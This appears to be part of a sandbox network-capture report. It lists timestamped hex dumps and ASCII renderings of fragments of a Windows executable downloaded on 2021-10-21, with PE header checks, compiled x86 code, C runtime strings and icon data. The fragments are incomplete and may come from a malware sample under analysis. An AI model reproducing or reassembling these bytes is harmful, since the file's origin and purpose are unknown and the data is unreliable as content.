                                  2021-10-21 17:40:39 UTC102INData Raw: 48 d9 c3 fc c7 18 24 20 40 cd 24 cc 00 8d 42 b8 00 48 e4 38 ff 74 48 38 48 74 53 01 e7 24 89 8b 43 40 c6 8d c5 4f cc 24 08 cc 8d f8 cc 38 ff ff 48 05 c4 48 08 08 24 00 8b 88 ff cc cc ea ff 53 c4 44 15 ff 83 7d 1f 00 d8 83 f0 74 1d 8b cc 83 f9 76 17 ff c1 30 7f 00 44 c3 00 8d 00 24 24 24 48 da 20 45 e8 e2 48 b7 f6 81 7e 03 48 24 83 01 48 74 49 24 76 5c 00 8b 41 09 2a f8 8b 01 00 c7 08 48 28 48 3e 54 13 0b ff 83 33 ff 44 8b 75 ff 8b f8 12 24 00 aa cb c8 10 89 00 74 89 48 4c 15 47 00 19 00 d9 8b 20 30 8b 95 44 18 20 8b 10 2f 48 24 89 89 f8 81 00 ff 48 48 89 48 80 8b 48 e6 0f cb 48 38 8b ff 14 48 4d 8b 48 8b c0 da 00 48 68 e8 47 24 53 89 48 00 48 c9 cb 45 8d 7f cc ff fb 3b cc e8 00 35 11 00 89 90 10 0f 48 23 15 48 57 5e 10 47 48 48 7c 15 48 24 85 cc 8d cc 44
                                  Data Ascii: H$ @$BH8tH8HtS$C@O$8HH$SD}tv0D$$$H EH~H$HtI$v\A*H(H>T3Du$tHLG 0D /H$HHHHH8HMHHhG$SHHE;5H#HW^GHH|H$D
                                  2021-10-21 17:40:39 UTC109INData Raw: c7 8b 9a 8b 48 8d 8b 48 17 8b 75 4d 08 00 db 7b cf d2 48 09 15 17 f4 1d 05 8b 77 31 8d ff 8b 15 8b 89 56 48 00 00 00 89 8d 8b 00 00 ff 8b d0 4e 79 01 c0 41 49 48 c3 7b eb c7 49 00 8b 09 8b c3 8b 83 c7 4c 07 05 24 05 85 0e 00 8b ff cc c7 74 d9 ff 8b fd 82 45 20 83 07 20 ff 00 08 15 c7 4c f1 49 61 8b 05 07 d0 d4 95 00 00 8d ec 48 03 85 00 e8 48 c4 85 8d 5c fa 28 48 c8 8b ff 8d 93 8b 10 3d 27 ff 89 c1 58 44 7c 14 35 4d ea 78 8b 8b 00 00 fc 0f 4c 4c 00 f4 ff f0 48 00 b6 48 24 96 7f 78 43 8b 58 8b 49 7c 9c c3 24 cc 48 1f 55 89 f3 89 30 cc 15 00 48 cc bb 40 f5 6d 1c c3 24 ee ff 63 25 48 48 05 d9 5b 4c e0 ce c7 3b 4c 00 48 78 ea 4d 00 05 ff 02 5c 74 75 00 b1 48 00 cb ba 48 2b 24 3b fe 24 c0 15 c0 57 8d 83 45 07 4c 74 15 89 cc c7 48 2a 00 00 4c 00 83 2b 15 fd 8b
                                  Data Ascii: HHuM{Hw1VHNyAIH{IL$tE LIaHH\(H='XD|5MxLLHH$xCXI|$HU0H@m$c%HH[L;LHxM\tuHH+$;$WELtH*L+
                                  2021-10-21 17:40:39 UTC117INData Raw: cc 0e c7 15 2f 44 00 fe 00 30 8b 0d 4c c3 08 00 00 21 11 c7 bf 19 f7 00 8b cc c7 00 66 8b 10 89 e9 89 00 00 a5 e8 63 b1 0f 0f 48 9a 4d 4d 02 cc 41 a8 8d e0 8b 50 c8 00 b0 83 ff 08 d0 b2 b3 cb 8d 00 15 cc 00 ff 24 15 15 8b 8d 00 e8 0e 54 48 83 cf 45 44 e0 30 d0 41 76 c3 45 ba 05 ce 00 05 c0 15 cc 00 cc cc 48 c0 c3 50 53 cc 1c 0b cc 00 eb d2 5c 48 00 48 97 4c 48 e1 ca 48 89 00 ff 60 74 ff 24 20 10 d4 00 56 8b 7d d8 24 20 0b 48 48 10 8b 18 48 cc d1 4d ea 15 48 48 83 cc 20 83 3a cc cc 15 8d 48 48 74 49 48 ff 2f 53 48 00 75 24 89 ff 8d 8d 08 09 48 8d 00 00 18 0c 4d 03 c0 24 89 20 24 49 cc 15 3e 83 48 48 be 7f bf 48 49 5d 60 48 c0 6d 00 f6 8d 8b 48 fe 00 15 20 8d 35 10 15 c1 48 cc c9 00 ff 7e 24 8d 20 48 4f 48 8b 8d 4c c7 48 13 74 8b 85 cc f8 f7 15 00 48 8d 01
                                  Data Ascii: /D0L!fcHMMAP$THED0AvEHPS\HHLHH`t$ V}$ HHHMHH :HHtIH/SHu$HM$ $I>HHHI]`HmH 5H~$ HOHLHtH
                                  2021-10-21 17:40:39 UTC125INData Raw: d3 30 ff 90 8b 20 8b cc e2 01 33 e8 1c 8b 48 20 f7 6d 48 01 8b 00 33 00 ec 4c e8 48 a6 4c 83 70 89 44 00 ff d2 c7 00 60 8b 5c 84 8d ff 00 3b 8d 50 e8 15 89 8b 19 48 00 8b 48 38 00 30 8b 83 10 63 8b 75 8b 0f 30 cc cc 40 eb a8 f8 ff 10 ff 48 2f 31 14 85 0e c0 8b 19 c7 4f 48 00 24 00 4c f7 e8 04 00 8b 60 60 8b d0 00 08 01 56 15 11 66 01 f0 50 09 60 4c 4c 24 24 89 f3 ff 24 00 48 48 48 24 eb cb 40 11 d6 48 ff ff 28 5f 0f ce 60 22 d2 da 00 08 8b 00 1d 79 f6 c0 0f 8b 16 8b ec 24 99 83 40 cc 02 48 8b 74 c2 48 4d 48 cb 8d 15 8b 5c ff 7c 8d 00 cf 4c 8b 5b 04 24 48 ff ba 1b 0f ff 01 0b 89 c3 cc 03 74 2b 15 f8 cc cb 48 15 04 ff 40 24 ff f8 00 e8 74 83 b8 74 5f c3 8b 33 d1 24 1c e8 19 48 af 8b 22 00 90 20 89 85 90 48 60 00 44 83 c1 15 8b 33 08 24 48 10 74 6c 00 b5 30
                                  Data Ascii: 0 3H mH3LHLpD`\;PHH80cu0@H/1OH$L``VfP`LL$$$HHH$@H(_`"y$@HtHMH\|L[$Ht+H@$tt_3$H" H`D3$Htl0
                                  2021-10-21 17:40:39 UTC133INData Raw: 83 c0 55 0f b7 c0 99 2b f0 8b 44 24 24 1b c2 03 de ba 00 00 00 00 13 d0 0f b7 44 24 10 80 c1 19 0f af f8 02 c9 89 54 24 18 02 4c 24 10 02 cb 89 3d 88 67 05 10 0f b6 c1 99 3b 54 24 18 72 27 77 04 3b c3 72 21 0f af 3d c4 67 05 10 8a c1 04 32 02 c9 02 c1 02 c3 0f b6 c0 89 3d 88 67 05 10 5f 5e 5b 8b e5 5d c3 5f 5e 0f b6 c1 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 51 8b 15 78 67 05 10 b8 48 68 05 10 53 57 8b d9 8b 0d c4 67 05 10 56 66 0f 1f 84 00 00 00 00 00 8b 35 88 67 05 10 3b ce 74 1f 29 18 8d 14 55 29 e7 fe ff 83 e8 08 89 15 78 67 05 10 3d 80 67 05 10 7f dd 8b 35 88 67 05 10 8a 0d 76 67 05 10 0f b6 c1 3b d0 72 29 8a c2 0f af f3 2a c3 02 c8 0f b6 c1 03 c3 88 0d 76 67 05 10 81 c2 99 73 ff ff 89 35 88 67 05 10 8d 14 50 89 15 78 67 05 10 8b
                                  Data Ascii: U+D$$D$T$L$=g;T$r'w;r!=g2=g_^[]_^[]QxgHhSWgVf5g;t)U)xg=g5gvg;r)*vgs5gPxg
                                  2021-10-21 17:40:39 UTC141INData Raw: ec 56 ff 75 08 8b f1 e8 25 00 00 00 c7 06 9c e2 02 10 8b c6 5e 5d c2 04 00 83 61 04 00 8b c1 83 61 08 00 c7 41 04 a4 e2 02 10 c7 01 9c e2 02 10 c3 55 8b ec 56 8b f1 8d 46 04 c7 06 60 e2 02 10 83 20 00 83 60 04 00 50 8b 45 08 83 c0 04 50 e8 6b 0b 00 00 59 59 8b c6 5e 5d c2 04 00 8d 41 04 c7 01 60 e2 02 10 50 e8 b6 0b 00 00 59 c3 55 8b ec 56 8b f1 8d 46 04 c7 06 60 e2 02 10 50 e8 9f 0b 00 00 f6 45 08 01 59 74 0a 6a 0c 56 e8 f7 01 00 00 59 59 8b c6 5e 5d c2 04 00 55 8b ec 83 ec 0c 8d 4d f4 e8 3d ff ff ff 68 3c 4d 05 10 8d 45 f4 50 e8 8a 0b 00 00 cc 55 8b ec 83 ec 0c 8d 4d f4 e8 53 ff ff ff 68 90 4d 05 10 8d 45 f4 50 e8 6d 0b 00 00 cc 8b 41 04 85 c0 75 05 b8 68 e2 02 10 c3 55 8b ec 83 25 d8 6b 05 10 00 83 ec 24 53 33 db 43 09 1d 10 60 05 10 6a 0a e8 d7 8e 00
                                  Data Ascii: Vu%^]aaAUVF` `PEPkYY^]A`PYUVF`PEYtjVYY^]UM=h<MEPUMShMEPmAuhU%k$S3C`j
                                  2021-10-21 17:40:39 UTC148INData Raw: 00 ff 15 28 e1 02 10 8b c8 85 c9 75 03 32 c0 c3 b8 4d 5a 00 00 66 39 01 75 f3 8b 41 3c 03 c1 81 38 50 45 00 00 75 e6 b9 0b 01 00 00 66 39 48 18 75 db 83 78 74 0e 76 d5 83 b8 e8 00 00 00 00 0f 95 c0 c3 8b ff 55 8b ec 51 51 a1 04 60 05 10 33 c5 89 45 fc 83 65 f8 00 8d 45 f8 50 68 4c ec 02 10 6a 00 ff 15 6c e1 02 10 85 c0 74 23 56 68 64 ec 02 10 ff 75 f8 ff 15 60 e1 02 10 8b f0 85 f6 74 0d ff 75 08 8b ce ff 15 10 e2 02 10 ff d6 5e 83 7d f8 00 74 09 ff 75 f8 ff 15 5c e1 02 10 8b 4d fc 33 cd e8 7b d5 ff ff 8b e5 5d c3 8b ff 55 8b ec 8b 45 08 a3 90 6c 05 10 5d c3 6a 01 6a 00 6a 00 e8 de fd ff ff 83 c4 0c c3 8b ff 55 8b ec 6a 00 6a 02 ff 75 08 e8 c9 fd ff ff 83 c4 0c 5d c3 a1 8c 6c 05 10 c3 8b ff 55 8b ec 83 ec 0c 83 7d 08 02 56 74 1c 83 7d 08 01 74 16 e8 3b 17
                                  Data Ascii: (u2MZf9uA<8PEuf9HuxtvUQQ`3EeEPhLjlt#Vhdu`tu^}tu\M3{]UEl]jjjUjju]lU}Vt}t;
                                  2021-10-21 17:40:39 UTC156INData Raw: 00 00 00 ff 15 ec e0 02 10 eb 15 83 f8 fc 75 10 8b 45 f4 c7 05 f8 6f 05 10 01 00 00 00 8b 40 08 80 7d fc 00 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b e5 5d c3 8b ff 55 8b ec 53 8b 5d 08 56 57 68 01 01 00 00 33 ff 8d 73 18 57 56 e8 6f c9 ff ff 89 7b 04 33 c0 89 7b 08 83 c4 0c 89 bb 1c 02 00 00 b9 01 01 00 00 8d 7b 0c ab ab ab bf 50 63 05 10 2b fb 8a 04 37 88 06 46 83 e9 01 75 f5 8d 8b 19 01 00 00 ba 00 01 00 00 8a 04 39 88 01 41 83 ea 01 75 f5 5f 5e 5b 5d c3 8b ff 55 8b ec 81 ec 20 07 00 00 a1 04 60 05 10 33 c5 89 45 fc 53 56 8b 75 08 8d 85 e8 f8 ff ff 57 50 ff 76 04 ff 15 e4 e0 02 10 33 db bf 00 01 00 00 85 c0 0f 84 f0 00 00 00 8b c3 88 84 05 fc fe ff ff 40 3b c7 72 f4 8a 85 ee f8 ff ff 8d 8d ee f8 ff ff c6 85 fc fe ff ff 20 eb 1f 0f b6 51 01 0f b6 c0 eb 0d
                                  Data Ascii: uEo@}tMP]US]VWh3sWVo{3{{Pc+7Fu9Au_^[]U `3ESVuWPv3@;r Q
                                  2021-10-21 17:40:39 UTC164INData Raw: 8d 14 36 8d 4a 08 3b d1 1b c0 85 c1 74 4a 8d 4a 08 3b d1 1b c0 23 c1 8d 4a 08 3d 00 04 00 00 77 19 3b d1 1b c0 23 c1 e8 83 35 00 00 8b fc 85 ff 74 64 c7 07 cc cc 00 00 eb 19 3b d1 1b c0 23 c1 50 e8 19 cd ff ff 8b f8 59 85 ff 74 49 c7 07 dd dd 00 00 83 c7 08 eb 02 33 ff 85 ff 74 38 6a 00 6a 00 6a 00 56 57 ff 75 f8 53 ff 75 10 ff 75 0c e8 fa d4 ff ff 85 c0 74 1d 33 c0 50 50 39 45 20 75 3a 50 50 56 57 50 ff 75 24 ff 15 78 e1 02 10 8b f0 85 f6 75 2e 57 e8 f4 fd ff ff 59 33 f6 53 e8 eb fd ff ff 59 8b c6 8d 65 ec 5f 5e 5b 8b 4d fc 33 cd e8 ec 96 ff ff 8b e5 5d c3 ff 75 20 ff 75 1c eb c0 57 e8 c6 fd ff ff 59 eb d2 8b ff 55 8b ec 83 ec 10 ff 75 08 8d 4d f0 e8 56 ca ff ff ff 75 28 8d 45 f4 ff 75 24 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 ff 75 0c 50 e8 af fd
                                  Data Ascii: 6J;tJJ;#J=w;#5td;#PYtI3t8jjjVWuSuut3PP9E u:PPVWPu$xu.WY3SYe_^[M3]u uWYUuMVu(Eu$u uuuuuP
                                  2021-10-21 17:40:39 UTC172INData Raw: 00 00 00 c3 8b 42 04 25 00 00 f0 7f 3d 00 00 f0 7f 74 03 dd 02 c3 8b 42 04 83 ec 0a 0d 00 00 ff 7f 89 44 24 06 8b 42 04 8b 0a 0f a4 c8 0b c1 e1 0b 89 44 24 04 89 0c 24 db 2c 24 83 c4 0a a9 00 00 00 00 8b 42 04 c3 8b 44 24 08 25 00 00 f0 7f 3d 00 00 f0 7f 74 01 c3 8b 44 24 08 c3 66 81 3c 24 7f 02 74 03 d9 2c 24 5a c3 66 8b 04 24 66 3d 7f 02 74 1e 66 83 e0 20 74 15 9b df e0 66 83 e0 20 74 0c b8 08 00 00 00 e8 d9 00 00 00 5a c3 d9 2c 24 5a c3 83 ec 08 dd 14 24 8b 44 24 04 83 c4 08 25 00 00 f0 7f eb 14 83 ec 08 dd 14 24 8b 44 24 04 83 c4 08 25 00 00 f0 7f 74 3d 3d 00 00 f0 7f 74 5f 66 8b 04 24 66 3d 7f 02 74 2a 66 83 e0 20 75 21 9b df e0 66 83 e0 20 74 18 b8 08 00 00 00 83 fa 1d 74 07 e8 7b 00 00 00 5a c3 e8 5d 00 00 00 5a c3 d9 2c 24 5a c3 dd 05 0c 22 03 10
                                  Data Ascii: B%=tBD$BD$$,$BD$%=tD$f<$t,$Zf$f=tf tf tZ,$Z$D$%$D$%t==t_f$f=t*f u!f tt{Z]Z,$Z"
                                  2021-10-21 17:40:39 UTC180INData Raw: ea 02 10 14 ea 02 10 30 ea 02 10 44 ea 02 10 64 ea 02 10 5f 5f 62 61 73 65 64 28 00 00 00 00 5f 5f 63 64 65 63 6c 00 5f 5f 70 61 73 63 61 6c 00 00 00 00 5f 5f 73 74 64 63 61 6c 6c 00 00 00 5f 5f 74 68 69 73 63 61 6c 6c 00 00 5f 5f 66 61 73 74 63 61 6c 6c 00 00 5f 5f 76 65 63 74 6f 72 63 61 6c 6c 00 00 00 00 5f 5f 63 6c 72 63 61 6c 6c 00 00 00 5f 5f 65 61 62 69 00 00 5f 5f 73 77 69 66 74 5f 31 00 00 00 5f 5f 73 77 69 66 74 5f 32 00 00 00 5f 5f 70 74 72 36 34 00 5f 5f 72 65 73 74 72 69 63 74 00 00 5f 5f 75 6e 61 6c 69 67 6e 65 64 00 72 65 73 74 72 69 63 74 28 00 00 00 20 6e 65 77 00 00 00 00 20 64 65 6c 65 74 65 00 3d 00 00 00 3e 3e 00 00 3c 3c 00 00 21 00 00 00 3d 3d 00 00 21 3d 00 00 5b 5d 00 00 6f 70 65 72 61 74 6f 72 00 00 00 00 2d 3e 00 00 2a 00 00 00
                                  Data Ascii: 0Dd__based(__cdecl__pascal__stdcall__thiscall__fastcall__vectorcall__clrcall__eabi__swift_1__swift_2__ptr64__restrict__unalignedrestrict( new delete=>><<!==!=[]operator->*
                                  2021-10-21 17:40:39 UTC188INData Raw: 04 00 00 d4 0b 03 10 5a 04 00 00 e4 0b 03 10 65 04 00 00 f4 0b 03 10 6b 04 00 00 04 0c 03 10 6c 04 00 00 14 0c 03 10 81 04 00 00 20 0c 03 10 01 08 00 00 2c 0c 03 10 04 08 00 00 7c f4 02 10 07 08 00 00 38 0c 03 10 09 08 00 00 44 0c 03 10 0a 08 00 00 50 0c 03 10 0c 08 00 00 5c 0c 03 10 10 08 00 00 68 0c 03 10 13 08 00 00 74 0c 03 10 14 08 00 00 80 0c 03 10 16 08 00 00 8c 0c 03 10 1a 08 00 00 98 0c 03 10 1d 08 00 00 b0 0c 03 10 2c 08 00 00 bc 0c 03 10 3b 08 00 00 d4 0c 03 10 3e 08 00 00 e0 0c 03 10 43 08 00 00 ec 0c 03 10 6b 08 00 00 04 0d 03 10 01 0c 00 00 14 0d 03 10 04 0c 00 00 20 0d 03 10 07 0c 00 00 2c 0d 03 10 09 0c 00 00 38 0d 03 10 0a 0c 00 00 44 0d 03 10 0c 0c 00 00 50 0d 03 10 1a 0c 00 00 5c 0d 03 10 3b 0c 00 00 74 0d 03 10 6b 0c 00 00 80 0d 03 10
                                  Data Ascii: Zekl ,|8DP\ht,;>Ck ,8DP\;tk
                                  2021-10-21 17:40:39 UTC195INData Raw: c0 ef 59 1e 17 a7 3f db 54 cf 3f 1a bd 16 3d 00 00 c7 02 90 3e aa 3f 86 d3 d0 c8 57 d2 21 3d 00 40 c3 2d 33 32 ad 3f 1f 44 d9 f8 db 7a 1b 3d 00 a0 d6 70 11 28 b0 3f 76 50 af 28 8b f3 1b 3d 00 60 f1 ec 1f 9c b1 3f d4 55 53 1e 3f e0 3e 3d 00 c0 65 fd 1b 15 b3 3f 95 67 8c 04 80 e2 37 3d 00 60 c5 80 27 93 b4 3f f3 a5 62 cd ac c4 2f 3d 00 80 e9 5e 73 05 b6 3f 9f 7d a1 23 cf c3 17 3d 00 a0 4a 8d 77 6b b7 3f 7a 6e a0 12 e8 03 1c 3d 00 c0 e4 4e 0b d6 b8 3f 82 4c 4e cc e5 00 39 3d 00 40 24 22 b4 33 ba 3f 35 57 67 34 70 f1 36 3d 00 80 a7 54 b6 95 bb 3f c7 4e 76 24 5e 0e 29 3d 00 e0 e9 02 26 ea bc 3f cb cb 2e 82 29 d1 eb 3c 00 a0 6c c1 b4 42 be 3f e9 4d 8d f3 0f e5 25 3d 00 60 6a b1 05 8d bf 3f a7 77 b7 a2 a5 8e 2a 3d 00 20 3c c5 9b 6d c0 3f 45 fa e1 ee 8d 81 32 3d
                                  Data Ascii: Y?T?=>?W!=@-32?Dz=p(?vP(=`?US?>=e?g7=`'?b/=^s?}#=Jwk?zn=N?LN9=@$"3?5Wg4p6=T?Nv$^)=&?.)<lB?M%=`j?w*= <m?E2=
                                  2021-10-21 17:40:39 UTC203INData Raw: ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8e 4a fe 91 8e 4a fe 91 8e 4a ff 91 8d 4a fe 95 86 4a fe 6a 5f 34 ff 6a 5e 34 fe 95 85 49 fe 96 86 4a ff 95 85 49 fe 95 85 49 fe 96 86 4a ff 95 85 49 fe 95 85
                                  Data Ascii: JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJj_4j^4IJIIJI
                                  2021-10-21 17:40:39 UTC211INData Raw: ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff b3 a7 7c ff a4 96 62 ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 96 86 4a ff 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6c d4 51 ff 6b d3 50 fe 6b d3 50 fe 6c d4 51 ff 95 85 49 fe 95 85 49 fe 96 86 4a ff 95 85
                                  Data Ascii: |||||||||||bJJJJJJJJJJJJlQkPkPlQkPkPlQkPkPlQkPlQkPkPkPlQkPkPlQkPkPlQkPkPlQkPkPlQkPkPlQkPlQkPkPlQIIJ
                                  2021-10-21 17:40:39 UTC219INData Raw: b4 5a e0 15 42 38 07 07 08 08 00 00 07 07 02 5d b6 3b 51 09 35 02 00 00 00 00 00 00 ff ff 01 01 00 00 ff ff c7 b3 b1 76 b0 2a a9 ff ff 07 07 00 00 00 76 b6 d8 4a 72 ef cf 4c cb 26 40 00 00 00 07 07 06 06 03 c7 84 fb 5b bd 54 36 20 a7 f7 a8 e4 2c 65 03 03 03 ff ff 00 00 07 07 00 00 f7 0e 4a 65 0e ff ff 00 00 00 00 00 00 00 00 ff ff fb f2 3b 3a 13 0c b7 65 9e 00 00 ff ff ff ff 08 08 72 e5 2c 70 25 08 08 0a 0a 00 96 3a b8 02 72 d4 39 00 ff ff ff ff 06 06 03 03 9b dd 59 d3 87 be a3 79 1f 00 00 00 00 0a 0a 03 03 00 00 07 07 00 00 ff b1 cc 57 13 05 19 ce be ff 00 00 03 03 00 00 ac 56 52 3e 4b 7a 36 5b da f9 36 4b ff ff 0a 0a 00 00 00 00 1c 6f f9 e2 2a f2 03 03 00 00 ff ff 00 00 00 00 06 a6 d5 78 e8 f4 a6 19 06 00 00 00 00 00 00 00 00 00 00 00 77 f9 59 56 28 98
                                  Data Ascii: ZB8];Q5v*vJrL&@[T6 ,eJe;:er,p%:r9YyWVR>Kz6[6Ko*xwYV(
                                  2021-10-21 17:40:39 UTC227INData Raw: 7b 73 23 33 0d 25 47 74 00 00 00 00 00 00 00 00 dd 54 0e 79 3b e6 64 ed 00 00 ff ff 07 a1 79 d0 c1 ad 7b ff 44 e4 d5 59 f5 07 ff ff ff ff 00 00 ff ff 46 8e 87 a9 27 a2 07 07 00 00 00 00 00 00 ff ff 00 00 00 00 0a 2c bc 42 f6 87 bb 70 0a 06 06 00 00 02 02 fd 86 55 ab b3 3e ec b8 ae be f6 ff ff fe fe 04 04 00 00 10 dd 22 39 28 c0 46 49 44 17 2e dc 6b ab ff ff 00 00 00 00 0a 0a 00 00 00 4f ac 55 ba 8c 00 0a 0a 03 03 00 00 ff ff 00 00 00 fb d6 da 2a a4 f7 fc 0f 53 00 ff ff 08 08 ff ff 00 9f 61 4a ea 1c 00 00 00 ff ff 9b 84 d7 ba 4d d8 82 00 00 ff ff 00 00 0b 0b 00 84 88 27 5e 9b 0f ef 1d dd 00 00 00 04 04 00 00 00 00 00 00 03 03 01 01 3b d5 ae 06 56 3d 36 ca 00 00 00 00 00 00 07 1d 8b b5 6d ec f2 3e 5e a0 5c fe 74 ab 85 85 68 a0 ff 00 ff 51 86 8b ff 5a c6 00
                                  Data Ascii: {s#3%GtTy;dy{DYF',BpU>"9(FID.kOU*SaJM'^;V=6m>^\thQZ
                                  2021-10-21 17:40:39 UTC234INData Raw: 00 00 76 74 07 97 6b 3c 86 b3 b8 e2 b6 72 00 00 00 0b 0b 01 01 42 68 8c 57 79 17 00 00 00 00 00 00 05 05 b5 82 0a 4c f3 53 41 ff ff 00 00 0a 0a 06 06 00 00 ff 31 16 ff 0e 1a 9c f1 03 77 32 29 ff 00 00 ff ff 07 07 06 06 ff ff 08 fe 32 f0 24 43 94 e7 3e 81 31 db 4e cb dc 08 08 08 08 08 00 00 00 e6 fe ff c2 39 00 04 04 00 00 a6 13 ea 30 72 4d 78 5c 2d ff ff 00 00 00 00 00 00 00 2e 0b 3c 70 b1 00 ff ff 08 08 00 00 ff ff ff ff 00 00 00 00 10 90 de 41 d4 41 9c 00 00 00 00 00 00 00 e1 f8 20 59 23 53 ca 8d 8e 00 06 06 00 00 00 00 08 8f ee 2a 2b 28 75 35 3a 08 00 00 00 00 00 00 00 00 02 02 3b fc fd b6 fa 72 71 70 31 f5 f4 f7 03 03 00 00 00 00 00 00 ff ff 00 00 f6 7b c1 2e 0b c1 00 00 00 00 00 00 0a 0a e1 1c 46 45 46 47 40 00 00 00 00 00 d5 bb b8 b9 55 3d bd 57 e2
                                  Data Ascii: vtk<rBhWyLSA1w2)2$C>1N90rMx\-.<pAA Y#S*+(u5:;rqp1{.FEFG@U=W
                                  2021-10-21 17:40:39 UTC242INData Raw: 7c 85 49 4f 72 ad 85 ff 85 96 fe ff 4a 96 51 96 95 fe c2 fe 86 86 97 86 50 53 fe fe 96 ff fe 96 d9 95 d3 fe 00 96 50 34 85 89 49 49 c9 96 ff d3 88 4a 77 86 be be aa fe 96 fe 91 95 ff a7 ff 5a 35 89 ff a9 3b 95 fe 49 86 4c 86 fe 00 65 95 ff c3 fe ff be ce fe fe fe 86 b0 4b 85 a7 96 ff 85 51 6b ff b1 6f 4a 96 ff a3 49 ad d4 fe fe 9b ff 63 be bd 51 ff 2c be fe c6 ff fe be 89 85 34 ff 00 d3 d4 4a 00 fe 00 b4 3a 95 ff 66 83 ff 95 d3 fe da 4a ff ff 3b 8c d4 3b d3 ff 96 86 3b b6 ca ff 85 85 85 96 a7 ac d9 4e aa 4a ff bd 4a 34 85 fe 96 6f fe fe ff 00 96 fe ff 3a 86 ff 4d ff 49 95 ff bd 7c a1 ff fe d4 ff 2d fe 52 49 9b ff 96 fe 7e 30 d3 7f 86 3a bd 95 ff 86 86 ff 4a 50 49 86 99 ff 51 95 fe 00 fe 85 78 ff 85 5f d4 da 49 fe ff bd 00 86 95 bb 85 ff 91 85 96 bb 7e 85
                                  Data Ascii: |IOrJQPSP4IIJwZ5;ILeKQkoJIcQ,4J:fJ;;;NJJ4o:MI|-RI~0:JPIQx_I~
                                  2021-10-21 17:40:39 UTC250INData Raw: 00 ff ff ff ff 07 07 3c 5c b2 d3 ff f6 2c dd ff ff 00 00 0b 0b 07 07 04 04 00 00 ff ff 00 22 43 f3 bd f1 1f 2a 1b 89 88 5d c0 00 00 00 ff ff 0b 0b a0 5e 4b a3 9c 91 00 00 0a 0a 00 00 0a 0a fe cb 7d 7e f3 47 fb 07 07 00 00 0a 0a 08 08 00 00 00 d7 c5 6e 68 4e 2c 79 6a 01 14 dd 00 00 00 00 00 02 02 ff ff ff ff 0a 6f 00 a9 0f 7d 08 7e 67 22 ac fa 9b 3b ec 0a 00 00 00 00 00 00 00 88 ac f1 51 ef 00 07 07 00 00 cb 99 95 f4 28 1d 94 77 4a 00 00 07 07 00 00 07 07 00 87 6a 90 8e 17 00 00 00 07 07 01 01 ff ff 07 07 ff ff 00 00 b5 c1 94 54 49 0e fe ff ff 00 00 00 00 00 c8 b3 18 d0 32 2f 96 d9 bd 00 00 00 0a 0a 04 04 0b 35 f5 aa a3 fa cb ac 6e 0b 00 00 08 08 00 00 00 00 01 01 af 73 44 a8 fb 7c 2f d4 e5 df 60 59 00 00 00 00 09 09 ff ff 00 00 00 00 83 17 42 12 07 83 00
                                  Data Ascii: <\,"C*]^K}~GnhN,yjo}~g";Q(wJjTI2/5nsD|/`YB
                                  2021-10-21 17:40:39 UTC258INData Raw: 00 00 00 f0 ec 30 d6 50 ff ff 01 01 ff f1 90 ea e7 a7 94 67 02 9d ff 00 00 06 06 ff ff 00 00 7c bf 89 72 9e 00 00 06 06 01 01 06 06 00 00 0b 0b 08 08 00 71 0d e4 0b 27 95 d8 00 00 00 00 00 07 07 93 76 73 fe 52 7f d7 c6 27 00 00 00 00 ff ff 00 00 cf 80 b0 4c 81 3f 5a 93 00 00 00 00 00 00 00 00 00 00 00 50 00 fc 00 18 eb fb eb ef 4d 32 79 00 00 00 00 00 00 00 00 00 00 00 00 53 92 54 fe 35 32 00 00 00 07 07 ff ff 0b b8 ec a4 47 e6 5a b6 0b 00 00 00 00 37 ad 1c 32 57 b7 2d 0a 15 a8 e1 05 05 00 00 0a 0a 00 00 00 de 0e ec 76 25 97 1c 9f d5 89 c9 81 df d9 00 06 06 00 00 00 00 00 00 00 00 04 04 00 00 26 69 2e cc 61 00 00 00 00 00 00 ff db 10 46 87 ea e0 0c 8e 5b ff 00 00 00 00 00 00 00 36 26 a9 06 88 00 01 01 07 07 ff ff 04 04 08 08 1a b4 9b a0 52 d5 40 03 03 00
                                  Data Ascii: 0Pg|rq'vsR'L?ZPM2yST52GZ72W-v%&i.aF[6&R@
